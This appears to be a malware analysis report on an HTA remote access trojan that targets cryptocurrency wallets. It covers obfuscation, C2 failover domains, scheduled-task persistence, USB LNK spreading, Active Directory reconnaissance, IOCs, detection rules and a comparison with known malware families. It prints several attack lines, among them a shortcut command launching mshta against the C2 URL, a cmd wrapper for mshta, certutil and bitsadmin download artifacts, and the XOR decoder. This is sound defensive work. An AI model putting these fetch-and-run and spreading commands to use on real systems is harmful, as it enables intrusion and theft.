Announcing “UpdateHub RAT”
1. Executive Summary
This report documents the analysis of a sophisticated HTML Application (HTA) malware sample designed for cryptocurrency wallet theft and corporate network reconnaissance. The malware employs advanced obfuscation techniques, establishes persistence via Windows Task Scheduler, and communicates with command-and-control (C2) infrastructure using custom-encrypted HTTP traffic.
Key Findings:
Primary targets: Ledger, Trezor, Atomic, Exodus, Guarda, KeepKey, and BitBox02 cryptocurrency wallets
Extensive Active Directory reconnaissance capabilities indicate corporate environment targeting
USB spreading functionality via malicious LNK file replacement
CrowdStrike Falcon detection with execution method modification
C2 dependency: malware requires live C2 server to execute (anti-analysis)
2. Sample Information
Summary of Sample Information
3. Obfuscation Analysis
The malware employs two XOR-based string decoders to hide operational strings from static analysis.
3.1 Primary Decoder (_dgaily)
Decodes the HTA application configuration used to hide the execution window:
Algorithm: XOR with rolling key (index * 137 + 140) & 0xFF
Output: <HTA:APPLICATION BORDER=’none’ SHOWINTASKBAR=’no’ SYSMENU=’no’ WINDOWSTATE=’minimized’>
3.2 Secondary Decoder (_dd7j5a)
Decodes all 271 operational strings including COM objects, WMI queries, file paths, and C2 endpoints.
Algorithm: XOR with rolling key (index * 107 + 218) & 0xFF
4. Command & Control Infrastructure
4.1 C2 Domain Pattern
The malware iterates through 11 C2 domain variants with failover capability:
https://s{i}-updatehub.cc where {i} = 10, 9, 8, 7, 6, 5, 4, 3, 2, 1, (empty)
4.3 Communication Encryption
Request body encrypted with 6-digit random XOR key prepended to payload
Custom Base64 encoding with UTF-16LE conversion
Response uses same XOR + Base64 scheme
JWT token-based authentication (Authorization: Bearer {jwt})
This RAT won’t continue full execution without reaching and then authenticating with the C2 Server
Authentication Required for Contnued Execution
Without Network Authentication with the C2, the furtherst the execution gets is mshta.exe executing the hta and enumeration of the system, but none of the post intial execution beyond that occurs. I tried setting up a fake C2 that could catch the request from the RAT but I can’t or didnt want to spend the time trying to set up the authentication parameters, and since I have the code, the code review provides all I need.
5. Cryptocurrency Wallet Targeting
The malware specifically checks for the presence of popular cryptocurrency wallet applications:
Detection results are transmitted to C2 via ledger=true/false and wallets=true/false parameters in the registration beacon.
6. Persistence Mechanism
The malware establishes persistence via Windows Task Scheduler, masquerading as a legitimate Google Update task.
6.1 Scheduled Task Configuration
6.2 Task Settings
StartWhenAvailable: true
DisallowStartIfOnBatteries: false
StopIfGoingOnBatteries: falWakeToRun: true
RunLevel: 1 (Highest) if admin privileges detected
7. Payload Delivery Methods
The malware employs seven different download methods with automatic fallback to ensure payload delivery success:
8. C2 Task Types
The malware supports the following task types received from the C2 server:
9. Anti-Analysis Techniques
9.1 C2 Dependency (Primary Blocker)
The malware requires a live C2 server to execute any malicious functionality. It iterates through all 11 C2 domain variants and exits silently if none respond with ‘success’. This effectively prevents dynamic analysis in isolated environments.
9.2 Self-Deletion
The zonexi() function deletes the HTA file immediately upon execution using Scripting.FileSystemObject.DeleteFile().
Before execution:
.hta file present before execution “a7ef…”
After Executing UpdateHub RAT:
.hta file is removed, self deletion
9.3 Security Product Detection
When CrowdStrike Falcon is detected, the malware modifies its execution method to use a cmd.exe wrapper: cmd.exe /c start “” /b mshta.exe {url}
9.4 Additional Techniques
Window Hiding: HTA configured with hidden window, plus window.resizeTo(0,0) and window.moveTo(-10000,-10000)
Silent Failures: All code wrapped in try/catch blocks to swallow errors
Admin Detection: Checks HKLM\SECURITY access via StdRegProv.GetSecurityDescriptor
Auto-Close: window.close() called at end of execution
10. USB Spreading Mechanism
Task Type 9 implements USB spreading functionality that targets removable drives.
10.1 Target File Types
.exe, .docx, .pdf, .doc
10.2 Infection Process
Enumerate removable drives (USB, external) via WMI Win32_DiskDrive
Scan for target file types (depth limited to 2 directories)
Hide original files by setting hidden attribute
Create .lnk shortcuts with same base name
Shortcut executes: cmd.exe /c start “” “.\{original}” & start “” mshta “{C2_URL}”
11. Active Directory Reconnaissance
Task Type 5 triggers comprehensive AD reconnaissance, indicating corporate environment targeting:
11.1 Information Collected
11.2 Enumeration Methods
WMI: Win32_ComputerSystem, Win32_NTDomain, Win32_Group, Win32_GroupUser
ADSI: AdsNameSpaces COM object with WinNT:// provider
Environment: LOGONSERVER variable for DC identification
12. Indicators of Compromise (IOCs)
12.1 Network Indicators
https://s[1-10]-updatehub.cc (C2 domains)
https://s-updatehub.cc (C2 domain, no number)
HTTP POST requests with 6-digit prefix + Base64 encoded body
12.2 File System Indicators
%userprofile%\*.exe (downloaded payloads)
%TEMP%\{random9}.txt (command output)
.lnk files replacing documents on USB drives
12.3 Scheduled Tasks
GoogleTaskSystem136.0.7023.12{GUID}
GoogleUpdaterTaskSystem136.1.7023.12{GUID}
12.4 Process Artifacts
mshta.exe spawning cmd.exe, powershell.exe
powershell.exe -ep Bypass -nop
bitsadmin.exe /transfer
certutil.exe -urlcache
rundll32.exe for DLL execution
13. MITRE ATT&CK Mapping
14. Detection Recommendations
14.1 Network Detection
Block/monitor DNS queries and HTTP traffic to *-updatehub.cc domains
Alert on HTTP POST requests with 6-digit numeric prefix in body
Monitor for mshta.exe making external HTTP connections
14.2 Endpoint Detection
Monitor mshta.exe spawning cmd.exe, powershell.exe, or network-related processes
Alert on scheduled task creation with “Google” in name but non-Google executable paths
Detect WMI queries to SecurityCenter2 from scripting hosts
Monitor certutil.exe and bitsadmin.exe used for file downloads
Alert on mass file attribute changes on removable drives
Monitor for LNK file creation alongside hidden files on USB drives
14.3 YARA Detection Strings
$hta1 = “HTA:APPLICATION” ascii $sched1 = “Schedule.Service” ascii $sched2 = “GoogleTaskSystem136” ascii $crypto1 = “Ledger Live” ascii $crypto2 = “@trezor” ascii $wmi1 = “SecurityCenter2” ascii $wmi2 = “Win32_NTDomain” ascii $adsi1 = “WinNT://” ascii
15. Attribution
I used Claude to help verify that I could not find an existing matching Malware Family. Critique and Discussion are appreciated! I dont want to falsely believe I’ve found something new and I try to be very data-driven, reach out if you disagree.
UpdateHub HTA RAT — Malware Family Comparison Analysis
Executive Summary
Based on extensive research, the UpdateHub HTA RAT appears to be a previously unreported or newly emerged malware family. While it shares TTPs with several known threats, it has unique characteristics that distinguish it from existing documented campaigns.
Similar Malware Families Identified
1. Aggah Campaign / Gorgon Group (HIGHEST SIMILARITY)
Similarity Score: 75%
Assessment: The infection chain is very similar to Aggah, but UpdateHub uses custom C2 infrastructure instead of legitimate services and has USB worm capabilities not seen in Aggah.
2. Spora / Gamarue / RETADUP (USB WORM COMPONENT)
Similarity Score: 60%
Assessment: The USB worm technique is nearly identical to Spora/Gamarue’s LNK spreading method, suggesting the author copied this proven technique.
3. KimJongRAT / BabyShark (KOREAN APT)
Similarity Score: 55%
Assessment: Similar focus on crypto wallets and HTA infection chain, but KimJongRAT is attributed to North Korean actors with different infrastructure patterns.
4. StilachiRAT (Microsoft-documented)
Similarity Score: 50%
Assessment: Similar crypto-stealing objectives but completely different codebase and delivery mechanism.
5. Nova Stealer / Odyssey Stealer (macOS Focus)
Similarity Score: 40%
Assessment: Different platform but similar targeting of hardware wallet users.
Unique Characteristics of UpdateHub RAT
These features distinguish UpdateHub from known families:
1. C2 Domain Failover Pattern
s10-updatehub.cc → s9-updatehub.cc → … → s-updatehub.cc
This numbered failover pattern is not commonly seen in documented malware.
2. Fake Google Update Task Names
GoogleTaskSystem136.0.7023.12{GUID}
GoogleUpdaterTaskSystem136.1.7023.12{GUID}
The specific version numbers (136.0.7023.12) appear unique to this family.
3. XOR Encoding with Multiplier
var tetorY = v31af8 * 107 + 218 & 255;
coreve769 += String.fromCharCode(testackS[v31af8] ^ tetorY);
This specific XOR pattern with position-based key generation is distinctive.
4. Combined Capabilities
No other documented family combines ALL of:
HTA-based delivery
USB LNK worm spreading
Crypto wallet detection (hardware wallets)
Extensive AD reconnaissance
CrowdStrike Falcon evasion
Custom XOR-encrypted C2 protocol
5. JWT-Based Authentication
The use of JWT tokens for C2 session authentication is relatively sophisticated for HTA-based malware.
Attribution Assessment
Possible Origins:
Cybercriminal Operation (Most Likely)
Financially motivated (crypto wallet focus)
Uses commodity techniques (copied USB worm code)
Brazilian C2 infrastructure hint (meusitehostgator.com.br in first sample)
No nation-state indicators
Evolution of Aggah/Gorgon Tools
Similar infection chain
Could be same actors with new infrastructure
Different final payload suggests possible code sharing
Commercial Malware-as-a-Service
Version numbering suggests ongoing development (v3.3)
Multiple download fallbacks suggest testing
Task-based modular design
YARA Rule Matching Results
Rules vs Known Families:
The generic rule would also match Aggah and KimJongRAT samples. The detailed rule is specific to UpdateHub and should not false-positive on other families.
Recommendations for Hunting
Search Terms for Existing Intel:
VirusTotal Intelligence:
content:”updatehub” OR content:”GoogleTaskSystem136" OR
content:”PT30M” AND content:”P3650D” AND content:”Schedule.Service”MalwareBazaar:
Tag: hta, crypto-stealer, usb-worm
Signature: Scheduled task with “Google” impersonation
MISP/OpenCTI:
Search for C2: *-updatehub.cc
Search for similar HWID patterns
Passive DNS:
Query: s?-updatehub.cc (where ? = 0–10)
Historical resolution data may reveal infrastructure
Conclusion
UpdateHub RAT appears to be a newly documented threat that combines techniques from multiple known malware families:
Infection chain resembles Aggah campaign
USB worm copied from Spora/Gamarue techniques
Crypto targeting similar to modern stealers like KimJongRAT
Custom C2 protocol with JWT authentication is unique
The malware should be tracked as a distinct family pending discovery of direct code overlaps with known campaigns. The YARA rules provided should help identify related samples in threat intelligence platforms.
References
Unit42 — Aggah Campaign Analysis
G DATA — Spora Ransomware Worm Analysis
Unit42 — KimJongRAT Stealer Variant
Microsoft — StilachiRAT Analysis
Moonlock — Anti-Ledger Malware Campaign
HP Wolf Security — Aggah Campaign Cryptocurrency Stealer
16. Conclusion
This HTA malware represents a professionally developed multi-stage loader and infostealer with the following characteristics:
Strong Evasion: Multiple download methods, hidden execution, security product detection, C2 dependency
Corporate Targeting: Extensive AD reconnaissance suggests enterprise environment focus
Cryptocurrency Focus: Specific wallet detection for theft operations
Self-Propagation: USB spreading via LNK replacement technique
Modular Design: Task-based C2 allows flexible payload deployment
The sophistication level and feature set suggest this is likely part of a commercial malware kit or organized threat actor operation targeting both financial (cryptocurrency) and corporate assets. The C2 dependency serves as both an anti-analysis mechanism and a kill switch, preventing execution in isolated analysis environments.